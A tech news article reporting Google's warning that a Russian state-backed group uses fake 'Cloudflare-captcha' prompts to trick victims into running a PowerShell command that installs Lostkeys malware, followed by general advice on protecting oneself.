Netvora logo
Submit Startup Subscribe
Home About Contact Submit Startup Subscribe

Google Warns of Targeted Attacks Using "Cloudflare-Captcha"

Comment

Google Warns of Targeted Attacks Using "Cloudflare-Captcha"

Netvora May 8, 2025 at 09:20 AM Security
Google Warns of Targeted Attacks Using "Cloudflare-Captcha"

Google Warns of Targeted Attacks Using "Cloudflare-Captcha"

By Netvora Tech News

Google has issued a warning about a new type of targeted attack that uses a technique called "Cloudflare-captcha" to infect victims with malware. The tech giant says the attacks are specifically targeting Western organizations and NGOs. The attackers begin by luring the victim to a specific website, which is how they manage to trick them into installing malware. Once the victim arrives on the website, they are presented with a message saying they need to solve a "captcha" before proceeding. In reality, the victim is being tricked into running a malicious PowerShell command on their own system. This command ultimately installs the Lostkeys malware, which steals files from the system and sends system information and running processes to the attacker. Google says the responsible group is often stealing login credentials for email accounts, allowing them to steal emails and contacts. Last month, security firm Proofpoint discovered that the use of malicious PowerShell commands is being used by both cybercriminals and state-sponsored actors for cyberespionage. According to Google, a group supported by the Russian state is behind the "Cloudflare-captcha" attacks. It's not clear how the attackers are managing to get their victims to visit the website in the first place, but Google is urging users to be cautious and avoid interacting with any suspicious websites or prompts.

How the Attack Works

The attack begins with the attacker luring the victim to a specific website, which is designed to look legitimate. Once the victim arrives on the website, they are presented with a message saying they need to solve a "captcha" in order to proceed. In reality, the "captcha" is just a ruse to get the victim to run a malicious PowerShell command on their own system.

  • The victim is tricked into running the malicious PowerShell command, which installs the Lostkeys malware.
  • The Lostkeys malware steals files from the system and sends system information and running processes to the attacker.
  • The attacker uses the stolen information to gain access to the victim's email account and steal emails and contacts.

What You Can Do to Protect Yourself

If you receive an email or message asking you to solve a "captcha" or perform any other suspicious action, do not interact with it. Instead, immediately report the incident to your IT department or security team. Additionally, make sure to keep your software and operating system up to date, and use strong, unique passwords for all of your accounts.

Comments (0)

Leave a comment

Back to homepage

You might also like